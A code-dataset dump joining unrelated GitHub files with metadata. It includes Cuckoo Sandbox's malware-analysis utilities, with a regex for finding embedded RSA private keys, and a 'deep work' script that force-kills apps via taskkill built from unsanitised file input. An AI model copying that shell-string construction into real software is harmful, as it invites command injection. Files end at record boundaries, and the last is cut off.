качестве решения я выбрала способ создания словарей из файла с нормализованными данными.\nДля создания словарей я создавала по 2 файла, в первый записывались ненормализованные данные,\nво второй результат ручной обработки. Также создала файл с исходными(ненормализованными)\nданными и пустой файл для результата.\nДля обработки входных данных используется библиотека FlashText, которая позволяет обработать\nвесь текст и параллельно заменить слова на соответсвующие им ключевые из словаря.\nРезультаты работы этой библиотеки были записаны в Excel.\nВ качестве бибилиотеки для записи результата в Excel я использовала Pandas.\"\"\"\nfrom flashtext import KeywordProcessor\nimport codecs\nimport pandas as pd\nkeyword_processor = KeywordProcessor()\n#\n# это все для извлечения бренда\n#\n# Списки для создания словаря брендов, извлекаются из файлов построчно\ntext1 = []\ntext2 = []\n# Извлекаем строки из файлов и добавляем в списки\nlines1 = (line.rstrip('\\n') for line in open(\"text1.txt\"))\nfor line in lines1:\n text1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"text2.txt\"))\nfor line in lines2:\n text2.append(line)\n# Создаем списки списков (в виде [a,[b]]) для создания словаря\ncompany_list = [[] for _ in range(len(text1))]\ncompany_full = [[] for _ in range(len(text1))]\n\nfor i in range(len(text1)):\n company_full[i].append(text1[i])\nfor i in range(len(text1)):\n company_list[i].append(text2[i])\n company_list[i].append(company_full[i])\n# Преобразуем в словарь и добавляем в словарь библиотеки FlashText\ncompany_dict = dict(company_list)\nkeyword_processor.add_keywords_from_dict(company_dict)\n# Создаем список для извлечения строк из заданного файла с ненормализованными данными\n# для того, чтобы прогнать через библиотеку FlashText и записать \"ключевые слова\" в итоговый файл с названиями брендов\ndone_list = []\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n done_list.append(line)\n# Записываем ключевые слова в файл построчно\nwith codecs.open(\"brands_new.txt\", 'w') as file:\n for row in done_list:\n brand = keyword_processor.extract_keywords(row)\n file.write('%s\\n' % brand)\n\n#\n# часть для граммов/литров/штук\n#\n# определяем новый словарь бибилиотеки FlashText для числовых величин\nkeyword_for_numbers = KeywordProcessor()\n# Списки для создания словаря чисел, извлекаются из файлов построчно\nnum1 = []\nnum2 = []\n# Извлекаем строки из файлов и добавляем в списки\nlines1 = (line.rstrip('\\n') for line in open(\"num1.txt\"))\nfor line in lines1:\n num1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"num2.txt\"))\nfor line in lines2:\n num2.append(line)\n# Создаем списки списков (в виде [a,[b]]) для создания словаря\nnum_list = [[] for _ in range(len(num1))]\nnum_full = [[] for _ in range(len(num1))]\n\nfor i in range(len(num1)):\n num_full[i].append(num1[i])\nfor i in range(len(num1)):\n num_list[i].append(num2[i])\n num_list[i].append(num_full[i])\n# Преобразуем в словарь и добавляем в словарь библиотеки FlashText\nnum_dict = dict(num_list)\nkeyword_for_numbers.add_keywords_from_dict(num_dict)\n# Создаем список для извлечения строк из заданного файла с ненормализованными данными\nnum_done_list = []\n\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n num_done_list.append(line)\n# Записываем ключевые слова в файл построчно\nwith codecs.open(\"numbers_new.txt\", 'w') as file:\n for row in num_done_list:\n numbers = keyword_for_numbers.extract_keywords(row)\n file.write('%s\\n' % numbers)\n\n#\n# Часть с наименованием товара\n#\n# определяем новый словарь бибилиотеки FlashText\nkeyword_for_name = KeywordProcessor()\n# Списки для создания словаря наименований, извлекаются из файлов построчно\nname1 = []\nname2 = []\n# Извлекаем строки из файлов и добавляем в списки\nlines1 = (line.rstrip('\\n') for line in open(\"name1.txt\"))\nfor line in lines1:\n name1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"name2.txt\"))\nfor line in lines2:\n name2.append(line)\n# Создаем списки списков (в виде [a,[b]]) для создания словаря\nname_list = [[] for _ in range(len(name1))]\nname_full = [[] for _ in range(len(name1))]\n\nfor i in range(len(name1)):\n name_full[i].append(name1[i])\nfor i in range(len(name1)):\n name_list[i].append(name2[i])\n name_list[i].append(name_full[i])\n# Преобразуем в словарь и добавляем в словарь библиотеки FlashText\nname_dict = dict(name_list)\nkeyword_for_name.add_keywords_from_dict(name_dict)\n# Создаем список для извлечения строк из заданного файла с ненормализованными данными\nname_done_list = []\n\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n name_done_list.append(line)\n# Записываем ключевые слова в файл построчно\nwith codecs.open(\"name_new.txt\", 'w') as file:\n for row in name_done_list:\n names = keyword_for_name.extract_keywords(row)\n file.write('%s\\n' % names)\n\n#\n# Часть записи в эксель\n#\nbrand = [] #список брендов для записи в эксель\nname = [] #список наименований\nweight = [] #список веса/объема\n# добавляем названия брендов в списки\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in codecs.open(\"brands_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n brand.append(line)\n# добавляем названия товаров в списки\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in codecs.open(\"name_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n name.append(line)\n# добавляем названия весов/объемов в списки\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in codecs.open(\"numbers_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n weight.append(line)\n# создаем список cols для наименования колонок\ncols = ['Наименование сокращенное', 'Бренд', 'Наименование из чека', 'Вес/объем']\n# создаем список rows, в нем будут содержаться строки, добавляем в него ранее созданные списки с обработанной информацией\nrows = [done_list, brand, name, weight]\n# в переменную df записываем DataFrame от Pandas\ndf = pd.DataFrame({\n cols[0]:rows[0],\n cols[1]:rows[1],\n cols[2]:rows[2],\n cols[3]:rows[3]\n})\n# Записываем в файл эксель\ndf.to_excel('./normalized.xlsx')\n", "repo_name": "karinka22149/test_case", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8327, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flashtext.KeywordProcessor", "line_number": 13, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 43, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 47, "usage_type": "call"}, {"api_name": "flashtext.KeywordProcessor", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 83, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 87, "usage_type": "call"}, {"api_name": "flashtext.KeywordProcessor", "line_number": 96, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 123, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 127, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 139, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 143, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "25222555314", "text": "import base64\nimport binascii\nimport hashlib\nimport logging\nimport mmap\nimport os\nimport pefile\nimport re\nimport sflock\nimport shutil\nimport tempfile\nimport zipfile\n\nfrom cuckoo.common.safelist import is_safelisted_domain\n\ntry:\n import pydeep\n HAVE_PYDEEP = True\nexcept ImportError:\n HAVE_PYDEEP = False\n\nlog = logging.getLogger(__name__)\n\nFILE_CHUNK_SIZE = 16*1024*1024\n\nURL_REGEX = (\n # HTTP/HTTPS.\n \"(https?:\\\\/\\\\/)\"\n \"(([\"\n # IP address.\n \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])]|\"\n # Or domain name.\n \"[a-zA-Z0-9\\\\.-]+)\"\n # Optional port.\n \"(\\\\:\\\\d+)?\"\n # URI.\n \"(/[\\\\(\\\\)a-zA-Z0-9_:%?=/\\\\.-]*)?\"\n)\n\nPUBPRIVKEY = (\n \"(\"\n \"(?:-----BEGIN PUBLIC KEY-----\"\n \"[a-zA-Z0-9\\\\n\\\\+/]+\"\n \"-----END PUBLIC KEY-----)\"\n \"|\"\n \"(?:-----BEGIN RSA PRIVATE KEY-----\"\n \"[a-zA-Z0-9\\\\n\\\\+/]+\"\n \"-----END RSA PRIVATE KEY-----)\"\n \")\"\n)\n\nclass Dictionary(dict):\n \"\"\"Cuckoo custom dict.\"\"\"\n\n def __getattr__(self, key):\n return self.get(key, None)\n\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\nclass URL:\n \"\"\"URL base object.\"\"\"\n\n def __init__(self, url):\n \"\"\"@param url: URL\"\"\"\n self.url = url\n\nclass File(object):\n \"\"\"Basic file object class with all useful utilities.\"\"\"\n # Given that ssdeep hashes are not really used much in practice we're just\n # going to disable its warning by default for now.\n notified_pydeep = True\n\n # The yara rules should not change during one Cuckoo run and as such we're\n # caching 'em. This dictionary is filled during init_yara().\n yara_rules = {}\n\n def __init__(self, file_path, temporary=False):\n \"\"\"@param file_path: file path.\"\"\"\n self.file_path = file_path\n self.temporary = temporary\n\n # these will be populated when first accessed\n self._file_data = None\n self._crc32 = None\n self._md5 = None\n self._sha1 = None\n self._sha256 = None\n self._sha512 = None\n\n def __del__(self):\n self.temporary and os.unlink(self.file_path)\n\n def get_name(self):\n \"\"\"Get file name.\n @return: file name.\n \"\"\"\n file_name = os.path.basename(self.file_path)\n return file_name\n\n def valid(self):\n return (\n self.file_path and\n os.path.exists(self.file_path) and\n os.path.isfile(self.file_path) and\n os.path.getsize(self.file_path) != 0\n )\n\n def get_data(self):\n \"\"\"Read file contents.\n @return: data.\n \"\"\"\n return self.file_data\n\n def get_chunks(self):\n \"\"\"Read file contents in chunks (generator).\"\"\"\n\n with open(self.file_path, \"rb\") as fd:\n while True:\n chunk = fd.read(FILE_CHUNK_SIZE)\n if not chunk:\n break\n yield chunk\n\n def calc_hashes(self):\n \"\"\"Calculate all possible hashes for this file.\"\"\"\n crc = 0\n md5 = hashlib.md5()\n sha1 = hashlib.sha1()\n sha256 = hashlib.sha256()\n sha512 = hashlib.sha512()\n\n for chunk in self.get_chunks():\n crc = binascii.crc32(chunk, crc)\n md5.update(chunk)\n sha1.update(chunk)\n sha256.update(chunk)\n sha512.update(chunk)\n\n self._crc32 = \"\".join(\"%02X\" % ((crc >> i) & 0xff)\n for i in [24, 16, 8, 0])\n self._md5 = md5.hexdigest()\n self._sha1 = sha1.hexdigest()\n self._sha256 = sha256.hexdigest()\n self._sha512 = sha512.hexdigest()\n\n @property\n def file_data(self):\n if not self._file_data:\n self._file_data = open(self.file_path, \"rb\").read()\n return self._file_data\n\n def get_size(self):\n \"\"\"Get file size.\n @return: file size.\n \"\"\"\n return os.path.getsize(self.file_path)\n\n def get_crc32(self):\n \"\"\"Get CRC32.\n @return: CRC32.\n \"\"\"\n if not self._crc32:\n self.calc_hashes()\n return self._crc32\n\n def get_md5(self):\n \"\"\"Get MD5.\n @return: MD5.\n \"\"\"\n if not self._md5:\n self.calc_hashes()\n return self._md5\n\n def get_sha1(self):\n \"\"\"Get SHA1.\n @return: SHA1.\n \"\"\"\n if not self._sha1:\n self.calc_hashes()\n return self._sha1\n\n def get_sha256(self):\n \"\"\"Get SHA256.\n @return: SHA256.\n \"\"\"\n if not self._sha256:\n self.calc_hashes()\n return self._sha256\n\n def get_sha512(self):\n \"\"\"\n Get SHA512.\n @return: SHA512.\n \"\"\"\n if not self._sha512:\n self.calc_hashes()\n return self._sha512\n\n def get_ssdeep(self):\n \"\"\"Get SSDEEP.\n @return: SSDEEP.\n \"\"\"\n if not HAVE_PYDEEP:\n if not File.notified_pydeep:\n File.notified_pydeep = True\n log.warning(\"Unable to import pydeep (install with `pip install pydeep`)\")\n return None\n\n try:\n return pydeep.hash_file(self.file_path)\n except Exception:\n return None\n\n def get_type(self):\n \"\"\"Get MIME file type.\n @return: file type.\n \"\"\"\n return sflock.magic.from_file(\n os.path.realpath(self.file_path)\n )\n\n def get_content_type(self):\n \"\"\"Get MIME content file type (example: image/jpeg).\n @return: file content type.\n \"\"\"\n return sflock.magic.from_file(\n os.path.realpath(self.file_path), mime=True\n )\n\n def get_exported_functions(self):\n \"\"\"Get the exported function names of this PE file.\"\"\"\n filetype = self.get_type()\n if \"MS-DOS\" not in filetype and \"PE32\" not in self.get_type():\n return\n\n try:\n pe = pefile.PE(self.file_path)\n if not hasattr(pe, \"DIRECTORY_ENTRY_EXPORT\"):\n return\n\n for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n if export.name:\n yield export.name\n except Exception as e:\n log.warning(\"Error enumerating exported functions: %s\", e)\n\n def get_imported_functions(self):\n \"\"\"Get the imported functions of this PE file.\"\"\"\n filetype = self.get_type()\n if \"MS-DOS\" not in filetype and \"PE32\" not in self.get_type():\n return\n\n try:\n pe = pefile.PE(self.file_path)\n if not hasattr(pe, \"DIRECTORY_ENTRY_IMPORT\"):\n return\n\n for imp in pe.DIRECTORY_ENTRY_IMPORT:\n for entry in imp.imports:\n yield dict(dll=imp.dll,\n name=entry.name,\n ordinal=entry.ordinal,\n hint=entry.hint,\n address=entry.address)\n except Exception as e:\n log.warning(\"Error enumerating imported functions: %s\", e)\n\n def get_apk_entry(self):\n \"\"\"Get the entry point for this APK. The entry point is denoted by a\n package and main activity name.\"\"\"\n filetype = self.get_type()\n if \"Zip archive data\" not in filetype and \"Java archive data\" not in filetype:\n return \"\", \"\"\n\n from androguard.core.bytecodes.apk import APK\n\n try:\n a = APK(self.file_path)\n if not a.is_valid_APK():\n return \"\", \"\"\n\n package = a.get_package()\n if not package:\n log.warning(\"Unable to find the main package, this analysis \"\n \"will probably fail.\")\n return \"\", \"\"\n\n main_activity = a.get_main_activity()\n if main_activity:\n log.debug(\"Picked package %s and main activity %s.\",\n package, main_activity)\n return package, main_activity\n\n activities = a.get_activities()\n for activity in activities:\n if \"main\" in activity or \"start\" in activity:\n log.debug(\"Choosing package %s and main activity due to \"\n \"its name %s.\", package, activity)\n return package, activity\n\n if activities and activities[0]:\n log.debug(\"Picked package %s and the first activity %s.\",\n package, activities[0])\n return package, activities[0]\n except Exception as e:\n log.warning(\"Error extracting package and main activity: %s.\", e)\n\n return \"\", \"\"\n\n def get_yara(self, category=\"binaries\", externals=None):\n \"\"\"Get Yara signatures matches.\n @return: matched Yara signatures.\n \"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n try:\n # TODO Once Yara obtains proper Unicode filepath support we can\n # remove this check. See also the following Github issue:\n # https://github.com/VirusTotal/yara-python/issues/48\n assert len(str(self.file_path)) == len(self.file_path)\n except (UnicodeEncodeError, AssertionError):\n log.warning(\n \"Can't run Yara rules on %r as Unicode paths are currently \"\n \"not supported in combination with Yara!\", self.file_path\n )\n return []\n\n results, rule = [], File.yara_rules[category]\n for match in rule.match(self.file_path, externals=externals):\n strings, offsets = set(), {}\n for _, key, value in match.strings:\n strings.add(base64.b64encode(value))\n offsets[key.lstrip(\"$\")] = []\n\n strings = sorted(strings)\n for offset, key, value in match.strings:\n offsets[key.lstrip(\"$\")].append(\n (offset, strings.index(base64.b64encode(value)))\n )\n\n meta = {\n \"description\": \"(no description)\",\n }\n meta.update(match.meta)\n\n results.append({\n \"name\": match.rule,\n \"meta\": meta,\n \"strings\": strings,\n \"offsets\": offsets,\n })\n\n return results\n\n def mmap(self, fileno):\n if hasattr(mmap, \"PROT_READ\"):\n access = mmap.PROT_READ\n elif hasattr(mmap, \"ACCESS_READ\"):\n access = mmap.ACCESS_READ\n else:\n log.warning(\n \"Regexing through a file is not supported on your OS!\"\n )\n return\n\n return mmap.mmap(fileno, 0, access=access)\n\n def get_urls(self):\n \"\"\"Extract all URLs embedded in this file through a simple regex.\"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n # http://stackoverflow.com/a/454589\n urls, f = set(), open(self.file_path, \"rb\")\n for url in re.findall(URL_REGEX, self.mmap(f.fileno())):\n if not is_safelisted_domain(url[1]):\n urls.add(\"\".join(url))\n return list(urls)\n\n def get_keys(self):\n \"\"\"Get any embedded plaintext public and/or private keys.\"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n f = open(self.file_path, \"rb\")\n return list(set(re.findall(PUBPRIVKEY, self.mmap(f.fileno()))))\n\n def get_all(self):\n \"\"\"Get all information available.\n @return: information dict.\n \"\"\"\n infos = {}\n infos[\"name\"] = self.get_name()\n infos[\"path\"] = self.file_path\n infos[\"size\"] = self.get_size()\n infos[\"crc32\"] = self.get_crc32()\n infos[\"md5\"] = self.get_md5()\n infos[\"sha1\"] = self.get_sha1()\n infos[\"sha256\"] = self.get_sha256()\n infos[\"sha512\"] = self.get_sha512()\n infos[\"ssdeep\"] = self.get_ssdeep()\n infos[\"type\"] = self.get_type()\n infos[\"yara\"] = self.get_yara()\n infos[\"urls\"] = self.get_urls()\n return infos\n\nclass Archive(object):\n def __init__(self, filepath):\n self.filepath = filepath\n self.z = zipfile.ZipFile(filepath)\n\n def get_file(self, filename):\n filepath = tempfile.mktemp()\n shutil.copyfileobj(self.z.open(filename), open(filepath, \"wb\"))\n return File(filepath, temporary=True)\n\nclass Buffer(object):\n \"\"\"A brief wrapper around string buffers for quick Yara rule matching.\"\"\"\n\n def __init__(self, buffer):\n self.buffer = buffer\n\n def get_yara_quick(self, category, externals=None):\n results, rule = [], File.yara_rules[category]\n for match in rule.match(data=self.buffer, externals=externals):\n results.append(match.rule)\n return results\n\nclass YaraMatch(object):\n def __init__(self, match, category=None):\n self.name = match[\"name\"]\n self.meta = match[\"meta\"]\n self._decoded = {}\n self.offsets = match[\"offsets\"]\n self.category = category\n\n self._strings = []\n for s in match[\"strings\"]:\n self._strings.append(s.decode(\"base64\"))\n\n def string(self, identifier, index=0):\n off, idx = self.offsets[identifier][index]\n return self._strings[idx]\n\n def strings(self, identifier):\n ret = []\n for off, idx in self.offsets[identifier]:\n ret.append(self._strings[idx])\n return ret\n\nclass ExtractedMatch(object):\n def __init__(self, match):\n self.category = match[\"category\"]\n self.program = match.get(\"program\")\n self.first_seen = match.get(\"first_seen\")\n self.pid = match.get(\"pid\")\n\n self.yara = []\n for ym in match[\"yara\"]:\n self.yara.append(YaraMatch(ym))\n\n # Raw payload.\n self.raw = match.get(\"raw\")\n self.info = match[\"info\"]\n", "repo_name": "cuckoosandbox/cuckoo", "sub_path": "cuckoo/common/objects.py", "file_name": "objects.py", "file_ext": "py", "file_size_in_byte": 14049, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5316, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 131, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 132, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 133, "usage_type": "call"}, {"api_name": "hashlib.sha512", "line_number": 134, "usage_type": "call"}, {"api_name": "binascii.crc32", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pydeep.hash_file", "line_number": 214, "usage_type": "call"}, {"api_name": "sflock.magic.from_file", "line_number": 222, "usage_type": "call"}, {"api_name": "sflock.magic", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "sflock.magic.from_file", "line_number": 230, "usage_type": "call"}, {"api_name": "sflock.magic", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pefile.PE", "line_number": 241, "usage_type": "call"}, {"api_name": "pefile.PE", "line_number": 258, "usage_type": "call"}, {"api_name": "androguard.core.bytecodes.apk.APK", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}.yara_rules", "line_number": 333, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 337, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 343, "usage_type": "call"}, {"api_name": "mmap.PROT_READ", "line_number": 362, "usage_type": "attribute"}, {"api_name": "mmap.ACCESS_READ", "line_number": 364, "usage_type": "attribute"}, {"api_name": "mmap.mmap", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 380, "usage_type": "call"}, {"api_name": "cuckoo.common.safelist.is_safelisted_domain", "line_number": 381, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path", "line_number": 387, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 391, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 415, "usage_type": "call"}, {"api_name": "tempfile.mktemp", "line_number": 418, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 419, "usage_type": "call"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}", "line_number": 420, "usage_type": "call"}, {"api_name": "{'APK': 'androguard.core.bytecodes.apk.APK'}.yara_rules", "line_number": 429, "usage_type": "attribute"}]} +{"seq_id": "26910775107", "text": "import requests\nimport json\nclass Github:\n def __init__(self):\n self.api_url=\"https://api.github.com\"\n \n def getUser(self,username):\n response=requests.get(self.api_url+'/users/'+username)\n return response.json()\n def getRepositories(self,username):\n response= requests.get(self.api_url+'/users/'+username+'/repos')\n return response.json()\n \ngithub=Github()\nwhile(True):\n secim=input(\"1-Find User\\n2-Get Repositories\\n3-Create Repository\\n4-Exit\\nSecim: \");\n if secim==4:\n break\n else:\n if secim==\"1\":\n username=input(\"Username: \")\n result=github.getUser(username)\n print(f\"name:{result['name']} public repos:{result['public_repos']} follower : {result['followers']}\")\n elif secim==\"2\":\n username=input('username: ')\n result=github.getRepositories(username)\n for repo in result:\n print(repo['name'])\n elif secim==\"3\":\n pass\n else:\n print(\"Yanlış seçim..\")\n\n", "repo_name": "hilal-bstn/PythonModules", "sub_path": "RequestsModuleUygulama2/RequestsModuleUygulama2.py", "file_name": "RequestsModuleUygulama2.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "35181497400", "text": "import os\n\nimport pytest\nimport requests_mock\n\nimport CTRegisterMicroserviceFlask\n\n\n@pytest.fixture\ndef validate_env():\n if not os.getenv('CT_URL'):\n raise Exception('CT_URL needs to be set')\n if not os.getenv('CT_TOKEN'):\n raise Exception('CT_TOKEN needs to be set')\n\n\n@requests_mock.mock(kw='mocker')\ndef test_microservice_register(mocker):\n post_calls = mocker.post(os.getenv('CT_URL') + '/api/v1/microservice', status_code=204)\n\n CTRegisterMicroserviceFlask.ct_register('test app', os.getenv('CT_URL'), 'http://local-url.com', True)\n\n assert post_calls.call_count == 1\n assert post_calls.called\n assert post_calls.last_request.text == '{\"name\": \"test app\", \"url\": \"http://local-url.com\", \"active\": true}'\n", "repo_name": "Skydipper/ct-register-microservice-python-flask", "sub_path": "CTRegisterMicroserviceFlask/tests/register_microservice_tests.py", "file_name": "register_microservice_tests.py", "file_ext": "py", "file_size_in_byte": 744, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "CTRegisterMicroserviceFlask.ct_register", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "requests_mock.mock", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "14405997937", "text": "import psutil\nimport os\nimport keyboard\nfrom datetime import datetime\nimport time\n\nbanned_apps = []\nrunning = True\n\nptr_start = 0\n\npath = input(\"Enter the txt file of all your banned apps: \")\n\n#getting our pause time so we don't die\nprint(\"\\nEnter the pause time, in SECONDS, per cycle\")\nprint(\"This will have a major effect on cpu usage (must be 5 or greater) seconds\")\nprint(\"The greater the pause time the less cpu power will be used\")\nprint(\"5 is the lowest amount of pause time\")\npause_time = int(input(\"Enter pause time\\n>>> \"))\n\n#if they don't set a pause step then we force one so their computer doesnt die\nif pause_time < 5:\n pause_time = 5\n\n#reading the file and putting it into a stirng\nban_file = open(path,\"r\")\nbanned_apps_string = ban_file.read()\nban_file.close()\n\n#checking if their a \\n escape sequence at the end of the file so everything stays constent\nif banned_apps_string[len(banned_apps_string)-1]!='\\n':\n banned_apps_string+='\\n'\n\n#parsing and reading the banned apps file\nfor ptr_end in range(len(banned_apps_string)):\n if banned_apps_string[ptr_end]=='\\n':\n app_name = banned_apps_string[ptr_start: ptr_end]\n ptr_start = ptr_end+1\n\n banned_apps.append(app_name)\n\ntime_start = datetime.now().strftime(\"%H:%M:%S\")\nprint(\"Spam W to end Deep Work mode\")\nprint(\"Start Time: \", time_start)\n\n#life time loop\nwhile running:\n if keyboard.is_pressed('w'):\n running = False\n break\n \n time.sleep(pause_time)\n\n print(\"Running Scan [REMINDER]: spam W to exit. If you wish\")\n for i in range(len(banned_apps)):\n if banned_apps[i] in (i.name() for i in psutil.process_iter()):\n print(\"You are supposed to be in deep work rn\")\n os.system('taskkill /f /im '+banned_apps[i]) \n\n#printing final information\nprint(\"Deep Work is over\")\nprint(\"Start Time: \", time_start)\nprint(\"End Time: \", datetime.now().strftime(\"%H:%M:%S\"))\n\ninput(\">>>\")\n", "repo_name": "MiniJ147/banned_app_checker", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "keyboard.is_pressed", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "psutil.process_iter", "line_number": 56, "usage_type": "call"}, {"api_name": "os.system", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "27898887426", "text": "import argparse\nfrom datetime import datetime\nimport os\nimport common\nimport sys\nimport torch\nimport itertools\nimport shutil\nimport numpy as np\nimport json\nfrom data.dnn.model import build\nfrom shutil import copyfile\nimport data.anchor.libvpx as libvpx\nfrom data.video.utility import profile_video, find_video\n\n\nclass Summary:\n def __init__(self, args):\n # dataset\n self.vpxdec_path = args.vpxdec_path\n self.data_dir = args.data_dir\n self.video_dataset = args.video_dataset\n self.dnn_dataset = args.video_dataset\n self.video_type = args.video_type\n self.dnn_type = args.dnn_type\n\n # codec\n self.skip = 0\n self.limit = args.total_length\n self.postfix = 's{}_l{}'.format(self.skip, self.limit)\n\n # test\n self.avg_anchors = args.avg_anchors\n self.epoch_length = args.epoch_length\n self.num_epochs = int(args.total_length / self.epoch_length)\n self.algorithm = args.algorithm\n\n def _validate(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = os.path.join(self.data_dir, content)\n lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n # validate\n json_path = os.path.join(content_dir, 'profile', lr_video_name, '{}.json'.format(cache_profile_name))\n with open(json_path, 'r') as json_file:\n json_data = json.load(json_file)\n anchors = json_data['frames']\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n idx = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n is_anchor = int(line[2])\n video_index, super_index = int(line[0]), int(line[1])\n if is_anchor == 1:\n if '{}.{}'.format(video_index, super_index) == anchors[idx]:\n idx += 1\n else:\n raise RuntimeError('{} != {}.{}'.format(anchors[idx], video_index, super_index))\n\n def _load_quality(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = os.path.join(self.data_dir, content)\n 